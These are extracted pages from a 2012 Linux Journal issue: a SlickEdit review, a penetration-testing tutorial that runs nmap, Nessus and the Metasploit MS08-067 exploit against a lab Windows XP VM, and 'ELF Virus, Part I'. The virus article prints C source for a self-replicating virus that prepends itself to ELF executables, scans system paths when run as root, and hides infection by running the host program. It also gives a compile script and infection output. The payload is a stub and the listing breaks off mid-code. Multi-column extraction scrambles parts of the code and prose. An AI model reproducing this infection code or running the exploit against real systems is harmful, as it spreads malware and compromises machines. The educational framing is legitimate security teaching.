REVIEWRegex TestingLife without regex would be hard tosort through. Bad joke, I know, but aspowerful as regular expressions canbe, they also can be mind-bending,especially after a long day of coding.SlickEdit includes a “Regex Evaluator”,which lets you test your regularexpression in real time against testdata. It doesn’t guarantee your regexwill be perfect, but the real-time testingcan help eliminate silly mistakes.MacrosProgrammers love to re-use code, butthey also tend to repeat the same tasksover and over as well. SlickEdit has anifty macro-recording feature, so thatyou can assign a keyboard shortcut toa process you need to do often. It canbe as simple as a key to add/remove acomment, or it can be as complicated asrewriting sections of code.If you have complex macros to create,SlickEdit includes its own programminglanguage specifically for macros. Slick-C hasextremely complex abilities that can interactwith just about every facet of the SlickEditprogram. If you generally go through along list of procedures when you start anew project, SlickEdit can be programmedto do them for you with a single keystroke.Information on the Slick-C language isavailable on the SlickEdit Web site.Magic PasteNo, I’m not talking about that stuff youate in kindergarten, but plain-old copy/paste. When you paste a chunk of codefrom one place to another, SlickEdit willmatch indentation and brace placementautomatically. It’s another feature thatdoesn’t affect the compiled code, but itmakes the source much easier to readand less embarrassing to share.Built-in Command LineA feature I bet Windows programmersappreciate even more than we do inLinux is the built-in command-lineinterface. Once activated, the commandline offers a set of commands that canbe accessed command-line-style. Itssimilarity to the Linux command linemight be a little confusing, becausealthough some of the output is similar(typing ls for instance), it’s not trulya Linux shell. For quick mouse-free fileinteraction, however, it is worth theeffort to learn the commands available.New FeaturesIf you’ve been a SlickEdit user in the past,you’ll likely find SlickEdit 2011 (version16) has a few really great enhancements.Notably for Linux users are the following:n 64-bit version for those using 64-bit Linux.n Ruby debugging.n Git support.n Multithreading.76 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

REVIEWAlthough most of the new featuresare self-explanatory, the multithreadingis more than just minor code efficiency.In the past, when parsing source codefor tagging, SlickEdit would force theuser to wait. Now, a little box popsup telling you it’s working in thebackground. For large projects withlots of files, this seemingly insignificantfeature can save tons of time.ConclusionSlickEdit is an amazing tool. As a noviceprogrammer, I barely scratched the surfaceof its full abilities, but even so, I foundit’s extremely useful. One of my favoritefeatures is the keyboard emulation, whichmakes the learning curve a little lesssteep. Although its features make it idealfor a full-time, professional programmer,unfortunately, so does its price. At $299for a single user license, SlickEdit isn’t foreveryone, but for programmers workingin an environment where time is money,its time-saving features alone will pay foritself in short order.Apart from a few minor issues, likethe lockups when trying to configureGit, SlickEdit was very stable during mytesting. The GUI itself seems to use aproprietary toolkit, or one I’m not familiarwith. The menus behave strangely fromtime to time, and they refuse to closeoccasionally, requiring me to click off themain window to get it to behave properly.It’s possible that is just some strangeconflict with my Xubuntu desktop, and itisn’t a showstopper by any means.If you want to try SlickEdit, there isa free 15-day trial, which includes helpfrom the SlickEdit support team. If you’rean Eclipse user, there is the SlickEditcore editor as a plugin for Eclipse. Bothoptions are available from SlickEdit’s Website: http://www.slickedit.com.■Shawn Powers is the Associate Editor for Linux Journal. He’s alsothe Gadget Guy for LinuxJournal.com, and he has an interestingcollection of vintage Garfield coffee mugs. Don’t let his silly hairdofool you, he’s a pretty ordinary guy and can be reached via e-mailat shawn@linuxjournal.com. Or, swing by the #linuxjournal IRCchannel on Freenode.net.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 77

APenetrationTester’sTOOLKITEver wonder exactly how vulnerable your network is?Using these tools can give you an idea and providethe means to protect yourself.MATTHEW AGLE78 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

FEATURE A Penetration Tester’s ToolkitFigure 1. Windows XP Machinebut need the strength of Metasploit (forscripting and grouping tests together).Even though they all get the job done, itdepends on your situation as to how youuse these tools.The first thing to do is install thesetools. Because this article is in LinuxJournal, I assume you’re running this ona Linux platform, but all of these toolswork on Windows as well. You couldinstall these tools from your repositories,but I recommend going to each tool’sWeb site and installing from its packages(this ensures that you get the latestversion with all current fixes and givesyou the best success for installation).Installation is pretty straightforward;just follow the steps from each tool’s80 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

Figure 2. Scanning Machinerespective site, and you’ll be fine. Assoon as the tools are installed, it’s timeto start playing with them. I highlyrecommend that you have either avirtual machine or a test machine ofsome sort as your first target, so as notto crash anything critical. Nothing’sworse than running a scan against abox, only to find out that you crashedit by accident (very high possibility withNessus and Metasploit, depending onwhat you are doing) and interruptedsomeone’s work.For the purpose of this article, I’mgoing to set up an example scenario.I am going to use a virtual machinewith Windows XP (SP3) loaded on itto run these three tools against. Thismachine will be a fresh install withno patches and the firewall disabled.The reason for this, quite simply, is tobe realistic when running these scans.More often than not, I have come acrossthis very machine, sitting in a corner,collecting dust and running some sortof old-mission-critical app (I’m sureWWW.LINUXJOURNAL.COM / JANUARY 2012 / 81

FEATURE A Penetration Tester’s Toolkityou’ve encountered something similar).Especially in large environments, thesemachines are very easy to forget aboutand can give you the biggest amountof trouble. I have configured the hostmachine to use an IP of 192.168.56.1,and the guest machine to use an IP of192.168.56.101.Let’s start with Nmap to begin theinformation-gathering stage (you haveto know what you’re working with) onyour target. Because you know the IP ofthe machine in question, you don’t haveto but just as easily could run a scanagainst a subnet or some other subset ofIP addresses. For this article, let’s stickwith 192.168.56.101. In your terminal,run the following (remember that youcan run this command as a regular useron the machine, as long as said user hasaccess to /usr/bin/):nmap -sV -A -v 192.168.56.101 > /tmp/nmap-outputI always send the output to a file, asit’s easier to read through afterward.Before delving into the output, however,let’s look at those switches:n -sV — this tells Nmap the type ofscan. In this case, it’s a version scanto see what programs are running onwhat ports (where available).n -A — this tells Nmap to run afingerprint check. This meansNmap will attempt to identify theversion of the OS and any relatedinformation correctly.n -v — verbosity—this is important,as you need this to get criticalinformation from Nmap.NOTE:When it comes to tools like Nmap, man pagesare your friend. Remember that these tools areextremely complex and have a lot of functions,and that means a lot of switches. When indoubt, always refer to the man pages, lest youuse the wrong switch and accidentally crash abox (easily done with tools like Nessus).Listing 1 shows the output of theprevious command.As you can see from the output inListing 1, you can identify that thisis indeed a Windows platform, mostlikely XP, with service pack 2 or 3 or2003 server. This type of scan is afingerprinting scan, which allows youto identify the OS and any servicesworth testing as closely as possible.The fact that you can pull thismuch information from a very basicscan alone indicates a low level ofprotection and a high level of threat.You easily can surmise that there is nolocal firewall, and that this box hasn’tgone through any hardening process.Although you could run many othertypes of scans against this box to get82 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

The fact that you can pull this much informationfrom a very basic scan alone indicates a low levelof protection and a high level of threat.Listing 1. Nmap OutputStarting Nmap 5.50 ( http://nmap.org ) at 2011-11-07 15:45 ESTNSE: Loaded 57 scripts for scanning.NSE: Script Pre-scanning.NSE: Starting runlevel 1 (of 2) scan.Initiating NSE at 15:45Completed NSE at 15:45, 0.00s elapsedNSE: Starting runlevel 2 (of 2) scan.Initiating ARP Ping Scan at 15:45Scanning 192.168.56.101 [1 port]Completed ARP Ping Scan at 15:45, 0.00s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 15:45Completed Parallel DNS resolution of 1 host. at 15:45, 0.02s elapsedInitiating SYN Stealth Scan at 15:45Scanning 192.168.56.101 [1000 ports]Discovered open port 139/tcp on 192.168.56.101Discovered open port 445/tcp on 192.168.56.101Discovered open port 135/tcp on 192.168.56.101Completed SYN Stealth Scan at 15:46, 1.15s elapsed (1000 total ports)Initiating Service scan at 15:46Scanning 3 services on 192.168.56.101Completed Service scan at 15:46, 6.01s elapsed (3 services on 1 host)Initiating OS detection (try #1) against 192.168.56.101NSE: Script scanning 192.168.56.101.NSE: Starting runlevel 1 (of 2) scan.Initiating NSE at 15:46Completed NSE at 15:46, 0.15s elapsedNSE: Starting runlevel 2 (of 2) scan.Nmap scan report for 192.168.56.101Host is up (0.00077s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn445/tcp open microsoft-ds Microsoft Windows XP microsoft-dsMAC Address: 08:00:27:5B:91:AC (Cadmus Computer Systems)Device type: general purposeRunning: Microsoft Windows XP|2003OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003Network Distance: 1 hopTCP Sequence Prediction: Difficulty=245 (Good luck!)IP ID Sequence Generation: IncrementalService Info: OS: WindowsHost script results:| nbstat:| NetBIOS name: XPTESTVM, NetBIOS user: ,| NetBIOS MAC: 08:00:27:5b:91:ac (Cadmus Computer Systems)| Names| XPTESTVM Flags: | WORKGROUP Flags: | XPTESTVM Flags: | WORKGROUP Flags: | WORKGROUP Flags: |_ \x01\x02__MSBROWSE__\x02 Flags: |_smbv2-enabled: Server doesn't support SMBv2 protocol| smb-os-discovery:| OS: Windows XP (Windows 2000 LAN Manager)| Name: WORKGROUP\XPTESTVM|_ System time: 2011-11-07 15:46:06 UTC-5TRACEROUTEHOP RTT ADDRESS1 0.77 ms 192.168.56.101NSE: Script Post-scanning.NSE: Starting runlevel 1 (of 2) scan.NSE: Starting runlevel 2 (of 2) scan.Read data files from: /usr/share/nmapOS and Service detection performed. Please report any incorrectresults at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 9.34 secondsRaw packets sent: 1072 (47.866KB) | Rcvd: 1017 (41.234KB)WWW.LINUXJOURNAL.COM / JANUARY 2012 / 83

FEATURE A Penetration Tester’s Toolkitmore information, you haveenough here to continue.You could narrow downwhether this is a serverthrough a process ofelimination. For example,if this is a desktop, thechances of it running aservice like MS SQL orExchange are very minimal.That said, you have enoughhere to proceed to thesecond tool, Nessus.With Nessus, let’s put thisbox to the test to see justwhat hackers could do tothis box if they got access.Nessus now uses a Webinterface, but you still canuse the command line if youprefer (remember to read theman pages). For this articlethough, let’s stick with theWeb interface. Once you login to the Web GUI (note: it’sa slick interface), click on thescan link to begin configuringa scan.Once you click add,configure your scan usingthese basic settings (Figure5). This will give you a quickscan with minimal impact, which is keyon an internal network. You don’t wantto disrupt network traffic and bring onthe wrath of your fellow admins andnetwork engineers.Figure 3. Nessus Landing PageFigure 4. Nessus Scan PageOnce it’s complete, click on Reportsand double-click your report to open it.Take a look at the report in detail byclicking on the IP in the report. Here youwill see a grid broken down by level of84 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

Figure 5. Nessus Scan Configuration PageFigure 6. Nessus Report on Test Boxconcern. As you can see, this very basicvulnerability scan returned a lot of goodinformation. In particular, let’s look atthe RPC issue. Open that up and take alook at the listing (Figure 7).What you can take awayfrom this is that RPC is aservice of concern and thatNessus by itself has an exploitagainst it. The plugin ID tellsyou which plugin to use totest the exploit; the namegives you some detail aboutthe issue, and port andseverity are self-explanatory.By clicking on the name,you pull up a window thatprovides plenty of detail,including what versions areaffected, patches released tofix it and various other tidbits(Figure 8).This gives us plenty to workwith, but let’s make sure thatwe really can exploit this andthat there is, indeed, causefor concern. You could dothat with Nessus (give it atry!), but rather than relyingsolely on Nessus, let’s bringin the final tool, the heavyhitterMetasploit.Why use two differenttools that can do the samejob? Preference, mostly. Ifind that Metasploit is muchbetter suited for exploitsthan Nessus. That’s not to say Nessusdoesn’t get the job done, but Metasploitwas built specifically for this purpose.If nothing else, a third tool presentsanother compelling piece of evidence toWWW.LINUXJOURNAL.COM / JANUARY 2012 / 85

FEATURE A Penetration Tester’s ToolkitFigure 7. A Lot Going on Here for a Fresh Buildthe documentation beforeever attempting a run ofMetasploit against a remotelyused box. Metasploit is a lotof fun, but kind of in theway that fireworks are a lotof fun (obviously, accidentscan happen if you’renot careful).Start by opening a terminal,su to root (if you have givena regular user access tothe proper files/directoriesfor Metasploit, it’s best torun as said user instead ofroot), and run the commandmsfconsole (Figure 9).Once you get a promptback, the first thing to do isselect your exploit to test.To see all available exploits,type the following, then goget a cup of coffee, becausethis takes a minute...or two:show exploitsFigure 8. Detailed Resultssupport your findings. It never hurts tohave an extra set of eyes.Before going any further, I should saythis: I have a ton of respect for the powerbehind Metasploit. Be sure to read allOkay, for the purpose ofthis example, let’s use thefollowing command (Figure10 shows the results), whichcorresponds to the previouserror shown from Nessus (Figure 8):use exploit/windows/smb/ms08_067_netapiYou could use another exploit, which86 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

simply would crash the box, butlet’s try not to be too destructive.With your exploit selected, nowyou need to choose a payload. Apayload is the set of instructionsto send via the exploit to get thedesired results. In this case, youwant to broadcast a messageto the computer. First, list yourpayloads by running the following:Figure 9.Behold,Metasploitshow payloadsFigure 10.ExploitsListed andExploitSelectedWWW.LINUXJOURNAL.COM / JANUARY 2012 / 87

FEATURE A Penetration Tester’s ToolkitNext, select the payload by using thefollowing command:set payload windows/speak_pwnedFinally, show the options for this payloadto see what you need to append to thiscommand to run the exploit. In this case,you need to give it the IP of the box inquestion (which makes sense—Metasploitis not a mind-reading tool). Listing 2 showsthe output.Figure 11. Payload Selected88 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

Listing 2. Output of Exploitmsf exploit(ms08_067_netapi) > set payload windows/speak_pwnedpayload => windows/speak_pwnedmsf exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description---- --------------- -------- -----------RHOST yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes Pipe name to use (BROWSER, SRVSVC)Payload options (windows/speak_pwned):Name Current Setting Required Description---- --------------- -------- -----------Exploit target:Id Name-- ----0 Automatic Targetingmsf exploit(ms08_067_netapi) > set RHOST 192.168.56.101RHOST => 192.168.56.101msf exploit(ms08_067_netapi) > exploit[*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)[*] Attempting to trigger the vulnerability...[*] Exploit completed, but no session was created.msf exploit(ms08_067_netapi) >As you can see, theexploit completed.And, if you havesound on your virtualmachine, you willhave heard somethingto the effect of“pwnd”. If you take alook at the Windowsmachine, you will seethat a service crashedin this exploit—arather typical sideeffect (Figure 12).You could try a fewother exploits (actuallyquite a few), but thisgives you a good ideaof how somethingsimple like sending anaudible could causean issue. Again, becareful, and alwaysplay on a test box.ConclusionAs you can see, thesethree tools, when usedtogether, make for apowerful investigationand the basis for agood report. Usedwisely, these toolscan help defend yournetwork against thesevery exploits. I oftenfind myself simplyWWW.LINUXJOURNAL.COM / JANUARY 2012 / 89

FEATURE A Penetration Tester’s ToolkitFigure 12.We brokethe box.using Nmap to do random scanson my subnet for new computers,Nessus to investigate further andfind vulnerabilities, and Metasploitto disable the device if necessary (ithappens more than you think). I alsouse these tools for generating reports,giving presentations to managementand keeping my network healthy ingeneral. I learn something new everytime I run them, either about thetools themselves or my network, thuskeeping it interesting. Give the tools atry and see what you think and enjoy!■Matthew Agle is a 30-year-old senior architect.When he’s not focusing on work, hacking, security,his blog or various other hobbies, he can be foundplaying with his kids and generally annoying his wife.You can reach him at matthew@impromptu-it.comor http://www.impromptu-it.com.ResourcesNmap: http://nmap.orgMetasploit: http://metasploit.comNessus: http://www.nessus.org90 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

Security Threats 2012:Secure & Empower Today’s EnterpriseProtection in a Cloud, Collaboration, andConsumerization EnvironmentJanuary 23, 2012 - Pre Conference WorkshopJanuary 24-25, 2012 - ConferenceWashington Plaza Hotel, Washington, DCThe consumerization of IT is in full tilt. The new application paradigm offers tremendouspower – but challenges established security, risk, and compliance practices. Yesterday’ssolutions can’t meet today’s IT reality. Cloud computing, mobile apps, always–onconnectivity, and social media force security professionals to develop new, morecomprehensive solutions. Providing effective, unobtrusive security is the true modernday IT objective. Security Threats 2012 presents the best practices for tomorrow’s securityenvironment.At this forum, leading-edge IT and security experts will discuss how they simultaneouslyprotect and empower their businesses. There are few unbiased IT/security discussions inthe marketplace, however, at this intimate forum you’ll have the opportunity to learn fromthought-leaders making these daily decisions.Sponsorship and Exhibiting OpportunitiesIf you are interested in sponsoring, speaking or exhibiting at this event,please call 212-532-9898 or email info@opalevents.orgRegisterTo register, visit us online at www.opalevents.orgor email us at marketing@opalevents.orgREF CODE: SETEA1203

ELFVirus,Part IHow to create a simple Linux ELF virus that can infect andpropagate through other ELF executables.HIMANSHU ARORAThe history of computer virusesdates back to 1949 when MrJohn von Neumann, a lecturer atthe University of Illinois, wrote a paper:“Theory of self-reproducing automata”.That was just a research work, but sincethen, computer viruses have evolveddramatically. Apart from early systems, theMicrosoft Windows OS has been a primarytarget for computer virus developers.Whether this is due to the number ofpeople using that OS or the numberof loop holes it carries, the debate stillremains open. For the past two decades,the popularity of the Linux OS has grownin leaps and bounds with more and moreWeb server machines running on Linux.Using Linux on a PC or laptop is a growingtrend. Linux’s growing popularity posesthe new threat of it being vulnerable tovirus attacks. Although the success ofexisting Linux viruses has been limited, thethreat still remains.In this article, I discuss a particularcategory of Linux viruses known as ELFviruses, but before doing that, first let meintroduce some basics that should helpyou understand the rest of the article.92 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

What Is ELF?ELF stands for Executable and LinkableFormat. It is a standard file format forobject files, executables, shared librariesand core dumps. It became a standardbinary file format for UNIX (and UNIX-likesystems) in 1999.An ELF file begins with an ELFheader, which is represented as thefollowing structure:independent of the file’s contentsand the processor on which the queryis made. The e_ident[] array in theprevious structure corresponds tothese initial bytes. The following is thebreakdown of the e_ident[] array:Name Value PurposeEI_MAG0 0 File identificationEI_MAG1 1 File identification#define EI_NIDENT 16typedef struct {} Elf32_Ehdr;unsigned char e_ident[EI_NIDENT];Elf32_HalfElf32_HalfElf32_WordElf32_AddrElf32_OffElf32_OffElf32_WordElf32_HalfElf32_HalfElf32_HalfElf32_HalfElf32_HalfElf32_Halfe_type;e_machine;e_version;e_entry;e_phoff;e_shoff;e_flags;e_ehsize;e_phentsize;e_phnum;e_shentsize;e_shnum;e_shstrndx;Here is the description of some of thebasic elements in the structure above:1) e_ident: ELF has capabilities tosupport multiple processors, dataencodings, classes of machines andso forth. Now, to support all this, theELF header includes some initial bytesthat specify how to interpret the fileEI_MAG2 2 File identificationEI_MAG3 3 File identificationEI_CLASS 4 File classEI_DATA 5 Data encodingEI_VERSION 6 File versionEI_PAD 7 Start of padding bytesEI_NIDENT 16 Size of e_ident[]EI_MAG0 to EI_MAG3 hold a magicnumber consisting of the followingfour bytes:'0x7f', 'E', 'L', 'F'These four magical bytes help identifywhether a file is of the ELF type or not.2) e_type: this value helps identify thetype of ELF file:Name Value MeaningET_NONE 0 No file typeET_REL 1 Relocatable fileET_EXEC 2 Executable fileET_DYN 3 Shared object fileET_CORE 4 Core fileWWW.LINUXJOURNAL.COM / JANUARY 2012 / 93

FEATURE ELF Virus, Part IET_LOPROC 0xff00 Processor-specificET_HIPROC 0xffff Processor-specific3) e_machine: this value helps identifythe architecture for an ELF file:Name Value MeaningET_NONE 0 No machineEM_M32 1 AT&T WE 32100EM_SPARC 2 SPARCEM_386 3 Intel ArchitectureEM_68K 4 Motorola 68000EM_88K 5 Motorola 88000EM_860 7 Intel 80860EM_MIPS 8 MIPS RS3000 Big-EndianEM_MIPS_RS4_BERESERVED10 MIPS RS4000 Big-Endian11-16 Reserved for future use4) e_version: this value is used toidentify the version of the object file:Name Value MeaningEV_NONE 0 Invalid versionEV_CURRENT 1 Current versionThe value 1 signifies the originalfile format; extensions will create newversions with higher numbers.What Is an ELF Virus?An ELF virus is a malicious piece of codethat mainly targets ELF executables andinfects them in such a way that afterbeing infected, either these executablesstart behaving abnormally or carry outsome things that are invisible to theuser. Most of the time, it’s the latter ofthe two characteristics (as mentionedearlier) that is prominent in infected ELFexecutables, the most common beingthe invisible propagation of the virus tofresh executables each time an infectedexecutable is run. Now you can easilyunderstand that if an ELF virus somehowgains root access to a system, it cancause havoc.Types of ELF VirusesMost ELF viruses are based on the SilvioCesare File Virus. These can be dividedinto two categories:1. A malicious piece of code that simplyprepends itself to the start of innocentexecutables.2. A malicious piece of code that isinjected into the text or data segmentof innocent executables.In this article, I focus on type 1 ELFviruses.The Virus: ExplainedThis virus, as mentioned previously,consists of a malicious piece of codethat prepends itself to the start ofother executables. Now, because itcompletely prepends itself to thestart of other executables, so that itpropagates completely, it leaves theleast dependency on its source of origin.This way, the virus creates its own copyin all the executables it infects.94 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

This increases the life of the virus,because it would become very hardto find all the executables that areinfected until you know the infectionmechanism of the malicious code.Further, even if the source of thevirus is deleted, the virus propagationdoes not stop until all the infectedexecutables are cleaned/deleted.Note: this virus would provide thepropagation mechanism (that is, howit infects the executable to propagate),but it would refrain from showing itsheart (that is, the piece of code thatactually does something wrong withthe infected executable or the systemas a whole). This is because I don’twant to encourage any newbie todirectly copy and paste the virus anduse it in any destructive way.The following is a brief description ofhow the virus works.When run for the very first time orrun from an infected executable, hereis what happens:1) As a very first step, it copies itselfinto memory. This is required, as thevirus would like to prepend itself toany ELF executable it encounters. Oneimportant thing to note here is the sizeof the virus’ compiled code. This size isrequired in the code so as to read itselfinto memory. I have defined a macroVIRUS_SIZE as a symbolic constantfor the size of the virus.The following code reads the virus intothe memory:if (read(fd1, virus, VIRUS_SIZE) != VIRUS_SIZE){}printf("\n read() failed \n");return 1;One concern here is that if someonechanges/adds/removes some code inthe original source in a way that thesize of the compiled binary changes.In that case, either manually changethe value of the macro VIRUS_SIZEand make it equal to the value spitout by the command ls -l , or write a scriptthat does this automatically everytime for you.2) In the second step, the virusdetermines the effective user ID of theuser that has run this virus. This lets thelogic determine whether the virus wasrun by root or any other user. Based onthis information, the code decides whichpaths to search for ELF executables. Thefollowing line in the code determines theeffective user ID:uid = geteuid();3) In the third step, if the effective UIDis that of root user, it starts scanning thesystem directories (hard-coded in thecode) where there could be potential ELFexecutables present. If the effective UIDis that of any other user, the code startsscanning the user’s login directory for anyvulnerable ELF executables:WWW.LINUXJOURNAL.COM / JANUARY 2012 / 95

FEATURE ELF Virus, Part Iif(uid == 0){/* Ohh...root powers...*/if(hdr.e_ident[0] != ELFMAG0 || hdr.e_ident[1] != ELFMAG1 ||hdr.e_ident[2] != ELFMAG2 ||hdr.e_ident[3] != ELFMAG3){printf("\n Not an ELF file \n");/* Add more system directories that contain important binaries*/return -1;//if(infections < MAX_INFECT) searchForELF("/sbin", virus);}//infecting system paths like these can cause havoc.... :-)if (hdr.e_type != ET_EXEC && hdr.e_type != ET_DYN)if(infections < MAX_INFECT){searchForELF("/home/himanshu/practice/elfvirus/filetoinfect",➥virus); // added my own directory as I wanted only select filesprintf("\n Seems to be a core dump, skipping... \n");return -1;➥to be infected.}}elselaunch_attack();5) Once the ELF is verified by thecode that it is a valid ELF that can beinfected, then:{/* The next two (commented) lines find the user's login directoryand try to infect all the ELF executables it can */// info=*getpwuid(uid);// if(infections < MAX_INFECT) searchForELF(info.pw_dir, virus);if(infections < MAX_INFECT)searchForELF("/home/himanshu/practice/elfvirus/filetoinfect",n The code creates a temporary file andwrites the buffer (compiled virus) thatwas copied in first step (step 1 above)to the temporary file created.n Reads the executable that is to beinfected in memory and appends it tothe temporary file (created above).➥virus); // added my own directory as I wanted only select files➥to be infected.}4) In the fourth step, the codechecks for any valid ELF by checkingits header. It checks the executablefor things like it should be an ELFtype, it should be for the architecturethat the virus itself is compiled from,it should not be a core dump file andso on:n Appends a magic number (to signifythat the executable is infected) at theend of this temporary file.n Changes the name of temp file sothat it replaces the original innocentexecutable file.So, in this step, the virus makes its firstpropagation to an executable.6) In the sixth step, if the virus was96 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

executed as root, it launches its mostdangerous piece of code—the payloadthrough which destruction can be done.As I have explained previously, this is adummy function launch_attack()in the code being discussed here, as Ido not want to promote copy-pasteexecutebehavior.Now whenever this infected executableis launched, the virus follows all these sixsteps again for infecting and propagatingto other executables.If the virus is being executed froman infected executable, then after allthe six steps described above, there hasto be way that the infected executablethat is launched should do its workcorrectly so that the user doesn’t evenhave an idea of what happened behindthe scenes. So in this case, the followingsteps (7–9) occur.7) In the seventh step, from the startof the executable, a seek to the end ofvirus code (that is, a seek equivalent toVIRUS_SIZE) is done. From here, all thebytes are copied (this would be compiledcode of the actual executable) andwritten to a temporary file.8) In the eighth step, the code forksa new process, executes this temporaryfile and after execution, deletes thetemporary file.9) The user sees only that he or sheexecuted a binary and that it executed fine.Note: I have added some logstatements to signify that the targetexecutable is infected.Note: in the code in Listing 1 (at theend of this article), just change thepath /home/himanshu/practice/elfvirus/filetoinfect to the path where someexecutables (that you want to infect) arekept in your machine.Compiling the VirusAs I already mentioned, the value ofthe VIRUS_SIZE macro should beequal to the size of the compiled code.Here is a script that will automatethe procedure:#!/bin/shgcc -o elfvirus elfvirus.cFILESIZE=`ls -l elfvirus|awk '$5 {print $5}'`PROGSIZE=`awk '/define VIRUS_SIZE/ {print $3}' elfvirus.c`if [ $FILESIZE -eq $PROGSIZE ];thenelseecho File sizes are correct...Ready to Roll!echo File size do not match!echo "Modifying source defines to VIRUS_SIZE $FILESIZE."awk ' {if(/define VIRUS_SIZE/) print "#define VIRUS_SIZE➥"'$FILESIZE'; else print $0}' elfvirus.c > elfvirus.c.newfimv elfvirus.c elfvirus.c.bakmv elfvirus.c.new elfvirus.c./createSimply run the above script to compilethe virus code.OutputI created a “hello world” executable inthe directory where this virus searches forexecutables to infect. The following is aWWW.LINUXJOURNAL.COM / JANUARY 2012 / 97

FEATURE ELF Virus, Part Icapture from my machine:himanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ ./hellohimanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ gcc -WallInside main➥hello.c -o hellohimanshu@himanshu-laptop ~/practice/elfvirus/filetoinfect $ ./helloInside searchForELFHello WorldAs you can see, the ELF executablehello, when run, outputs “Hello World”.Now, I run the virus code:Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/..]It is a directoryFound ==> [/home/himanshu/practice/elfvirus/filetoinfect/.]It is a directoryhimanshu@himanshu-laptop ~/practice/elfvirus $ ./elfvirusFound ==> [/home/himanshu/practice/elfvirus/filetoinfect/hello]Inside mainCould not open [/home/himanshu/practice/elfvirus/filetoinfect/hello]Inside searchForELFVirus executed by an infected executable. Launching the executable now.Found ==> [/home/himanshu/practice/elfvirus/filetoinfect/..]It is a directoryFound ==> [/home/himanshu/practice/elfvirus/filetoinfect/.]It is a directoryFound ==> [/home/himanshu/practice/elfvirus/filetoinfect/hello]Hello WorldSo, it is clear from the above outputthat the virus has infected the executablehello, which, when run now, will tryto infect other executables in the pathmentioned in source code of the virus.Inside infect***Infected /home/himanshu/practice/elfvirus/filetoinfect/hello.Virus executed from source and not from any infected executable. ExitinggracefullyThe log statements said that the virussuccessfully infected /home/himanshu/practice/elfvirus/filetoinfect/hello. Now,when I again execute hello, kept at thesame path, I see:ConclusionThis article explains a basic ELF virus thatprepends itself before other executables andinfects them. This article is first in its series.My next article will show how to infect ELF byinjecting code into text or a data segment.■Himanshu Arora has been working as a software developerfor the past four years. His Favorite language is C. Hewrites technical articles for many Web sites and lovesadventure journeys with friends.98 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

Listing 1. A Simple ELF Virus#include #include #include #include #include #include #include #include #include #include #include #include void launch_attack(void);int infect(char *filename, int fd, char *virus);void searchForELF(char *directory, char *virus);// This value must be equal to the size of thecompiled virus.// Adjust it if the size of the compiled binarychanges.#define VIRUS_SIZE 14255#define MAGIC 6585#define TMPLATE "/tmp/.lx2k2XXXXXX"#define MAX_INFECT 5#define MAX_SIZE 1024static int magic = MAGIC;int infections=0;int main(int argc, char *argv[], char *env_ptr[]){printf("\n Inside main \n");struct stat st;int fd1, fd2;uid_t uid;pid_t pid;char * host = NULL;char virus[VIRUS_SIZE];char tmp_file[MAX_SIZE];//struct passwd info;int len = 0;fd1 = open(argv[0],O_RDONLY,0);{printf("\n fstat() failed \n");return -1;}if (read(fd1, virus, VIRUS_SIZE) != VIRUS_SIZE){printf("\n read() failed \n");return 1;}uid = geteuid();if(uid == 0){/* Ohh...root powers...*//* Add more system directories containingimportant binaries*///if(infections < MAX_INFECT)searchForELF("/sbin", virus); ////infecting system paths like these cancause havoc.... :-)if(infections < MAX_INFECT)searchForELF("/home/himanshu/practice/elfvirus/filetoinfect",virus); // added my own directory as I wanted onlyselect files to be infected.launch_attack();}else{/* The next two (commented) lines find theuser's login directory and try to infectall the ELF executables it can*/// info=*getpwuid(uid);// if(infections < MAX_INFECT)➥searchForELF(info.pw_dir, virus);if(infections < MAX_INFECT)searchForELF("/home/himanshu/practice/➥elfvirus/filetoinfect", virus); // added my owndirectory as I wanted only select files to beinfected.}if (fstat(fd1, &st) < 0)▼WWW.LINUXJOURNAL.COM / JANUARY 2012 / 99

FEATURE ELF Virus, Part I/* Files infected, if the virus was executedfrom an executable, go ahead and launch thatexecutable */len = st.st_size - VIRUS_SIZE;if(!len){printf("\n Virus executed from source and➥not from any infected executable. Exiting➥gracefully\n");return 0;}else{printf("\n Virus executed by an infected➥executable. Launching the executable now...\n");}// seek at the begining of executable code thatuser intented to runif(lseek (fd1,VIRUS_SIZE, SEEK_SET) != VIRUS_SIZE){printf("\n lseek() failed \n");return -1;}// Allocate some memory to hold the executablecode in byteshost = (char*)malloc(len);if(host == NULL){printf("\n malloc() returned NULL while➥allocating [%d] bytes\n",len);return -1;}// Read the bytesif(read(fd1, host, len) != len){printf("\n read() failed \n");return -1;}close(fd1);// Create a temp filestrncpy(tmp_file, TMPLATE, MAX_SIZE);fd2 = mkstemp(tmp_file);if(fd2

